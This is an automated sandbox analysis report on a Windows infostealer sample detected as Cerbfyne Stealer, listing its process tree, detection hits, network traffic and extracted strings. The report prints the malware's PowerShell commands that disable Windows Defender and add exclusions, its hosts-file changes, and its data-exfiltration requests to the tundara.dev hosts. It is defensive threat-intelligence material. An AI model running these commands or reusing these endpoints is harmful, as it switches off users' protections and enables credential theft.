Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1563338
MD5:9096f57fa44b8f20eebf2008a9598eec
SHA1:42128a72a214368618f5693df45b901232f80496
SHA256:f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934
Tags:exeuser-Bitsight
Infos:

Detection

Cerbfyne Stealer
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Cerbfyne Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9096F57FA44B8F20EEBF2008A9598EEC)
    • powershell.exe (PID: 2408 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7272 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7824 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7876 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7968 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 8064 cmdline: wmic cpu get Name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 8132 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 5660 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_CerbfyneStealerYara detected Cerbfyne StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CerbfyneStealerYara detected Cerbfyne StealerJoe Security
      00000000.00000000.1232496497.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CerbfyneStealerYara detected Cerbfyne StealerJoe Security
        Process Memory Space: file.exe PID: 1408JoeSecurity_CerbfyneStealerYara detected Cerbfyne StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.file.exe.7ff608fb0000.0.unpackJoeSecurity_CerbfyneStealerYara detected Cerbfyne StealerJoe Security
            0.2.file.exe.7ff608fb0000.0.unpackJoeSecurity_CerbfyneStealerYara detected Cerbfyne StealerJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1408, ParentProcessName: file.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe, ProcessId: 2408, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1408, ParentProcessName: file.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7272, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1408, ParentProcessName: file.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe, ProcessId: 2408, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1408, ParentProcessName: file.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe, ProcessId: 2408, ProcessName: powershell.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 23%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 51.210.106.44 51.210.106.44
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /ws?id=ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1Host: w.tundara.devUser-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: +ck7nJwhsfDtHrCBl6ZoOw==Sec-WebSocket-Version: 13Upgrade: websocket
              Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: b.tundara.dev
              Source: global trafficDNS traffic detected: DNS query: w.tundara.dev
              Source: unknownHTTP traffic detected: POST /tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1Host: b.tundara.devUser-Agent: Go-http-client/1.1Content-Length: 573Content-Type: multipart/form-data; boundary=55886a13b9171df724d2ad867f316f6cc583361f023996dbc4ae71c10002Accept-Encoding: gzip
              Source: file.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: file.exeString found in binary or memory: http://dejavu.sourceforge.net
              Source: file.exeString found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
              Source: file.exeString found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
              Source: file.exeString found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
              Source: file.exeString found in binary or memory: http://emojione.com/licensingColor
              Source: file.exeString found in binary or memory: http://emojione.comEmojiOne
              Source: file.exeString found in binary or memory: http://ip-api.com/json/DestroyEnvironmentBlock
              Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: file.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: file.exeString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
              Source: file.exeString found in binary or memory: http://s.symcd.com0_
              Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B0C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: file.exeString found in binary or memory: http://sw.symcb.com/sw.crl0
              Source: file.exeString found in binary or memory: http://sw.symcd.com0
              Source: file.exeString found in binary or memory: http://sw1.symcb.com/sw.crt0
              Source: file.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: file.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: file.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B0C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: file.exe, 00000000.00000002.1482903932.000000C000415000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi
              Source: file.exeString found in binary or memory: https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/reflect:
              Source: file.exe, 00000000.00000002.1486338572.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1486338572.000000C000E7A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: file.exeString found in binary or memory: https://cdn.discordapp.com/avatars/C:
              Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: file.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: file.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: file.exeString found in binary or memory: https://d.symcb.com/rpa0)
              Source: file.exeString found in binary or memory: https://discord.com/api/v8/guilds/expected
              Source: file.exeString found in binary or memory: https://discord.com/api/v9/users/
              Source: file.exeString found in binary or memory: https://discord.gg/tls:
              Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: file.exe, 00000000.00000002.1486338572.000000C000C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1489672991.000000C0012FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1489672991.000000C0012FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C00010A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: file.exe, 00000000.00000002.1486338572.000000C000C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: DirectInput8Creatememstr_f16d2568-f
              Source: C:\Users\user\Desktop\file.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dllJump to behavior
              Source: file.exeBinary or memory string: dunsupported CFF versionunsupported charset: %qinvalid escape sequenceunknown empty width argRemoveFontMemResourceExSHGetSpecialFolderPathWRegisterRawInputDevicesGetEnvironmentVariableAGetLogicalDriveStringsAQueryPerformanceCounterSetConsoleTextAttributeTryEnt

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Modifies the hosts file
              Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: file.exeStatic PE information: Number of sections : 11 > 10
              Source: classification engineClassification label: mal92.troj.adwa.spyw.evad.winEXE@25/13@4/2
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\fyneJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2868:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\logs-tempJump to behavior
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: file.exe, file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
              Source: file.exe, file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: file.exe, 00000000.00000002.1502296845.0000022DFC8D5000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1502749198.0000022DFC970000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exe, file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: file.exeReversingLabs: Detection: 23%
              Source: file.exeString found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
              Source: file.exeString found in binary or memory: slateNameWgetprotobyname procedure in winapi error #RegSetValueExWSystrayMonitorFyne error: %v ... omitting arrow-back.svgarrow-down.svgfile-audio.svgfile-image.svgfile-video.svgfolder-new.svgmail-reply.svgmedia-play.svgmedia-stop.svgvisibility.svgcolorChromat
              Source: file.exeString found in binary or memory: C:/Users/Tundara/go/pkg/mod/fyne.io/fyne/v2@v2.5.2/internal/metadata/load.go
              Source: file.exeString found in binary or memory: current map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:second
              Source: file.exeString found in binary or memory: current map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:second
              Source: file.exeString found in binary or memory: tupInfoWProcess32FirstWUnmapViewOfFileFailed to load Failed to find RegCreateKeyExWRegDeleteValueWnot a valid URImenu-expand.svgcontent-add.svgcontent-cut.svgfolder-open.svgmedia-music.svgmedia-photo.svgmedia-video.svgmedia-pause.svgvolume-down.svgvolume-mute.
              Source: file.exeString found in binary or memory: data/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed
              Source: file.exeString found in binary or memory: data/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed
              Source: file.exeString found in binary or memory: ... omitting arrow-back.svgarrow-down.svgfile-audio.svgfile-image.svgfile-video.svgfolder-new.svgmail-reply.svgmedia-play.svgmedia-stop.svgvisibility.svgcolorChromaticdocumentCreatemoreHorizontalmailAttachmentviewFullScreendisabledButtonmenuBackgroundscrollBarSmallsubHeadingTextFSNOTIFY_DEBUGGetWindowTextAksdumperclienthttpdebuggeruiprocess hackersimpleassemblysystemexplorervirustotal.comtrendmicro.com-ExclusionPath-MAPSReportingOpenSCManagerWModule32FirstWunreachable: mime/multipartContent-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eofinternal errorunknown error unknown code: Not AcceptableNotInitializedAPIUnavailablenot a PNG fileDefWindowProcWTrackPopupMenuTaskbarCreated.WithoutCancel.WithDeadline(rectangle.fragrectangle.vertsimple_es.fragsimple_es.vertrect_size_halfunexpected '='unexpected '.'InlineTableEndControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWunknown markerbad RST markerinvalid pid %vEnumPageFilesWsignons.sqlitecookies.sqliteempty passwordfile:///(.*?),Discord Canary` - Members: `intentlauncherlauncherconfigpaladium-groupBadlion Clientbad record MACAccept-CharsetDkim-Signatureunknown mode: need more dataREQUEST_METHODprefix length not an ip:portinvalid Prefixlen of type %snot a BMP fileultracondensedextracondensedguillemotrightguilsinglrightperiodcenteredquotesinglbaseAR MingtiM KSCIPAMonaPGothicAR MinchoL JISIPAMonaPMinchoAR PL UMing CNAR PL UMing TWAR PL UMing HKTeX Gyre HerosNimbus Mono PSTeX Gyre BonumURW Chancery LURW Palladio LCumberland AMTBaekmuk BatangMgOpen ModernaSegoe UI EmojiCentury GothicSUSE Sans MonoLohit AssamesePersian_squareHapax Berb
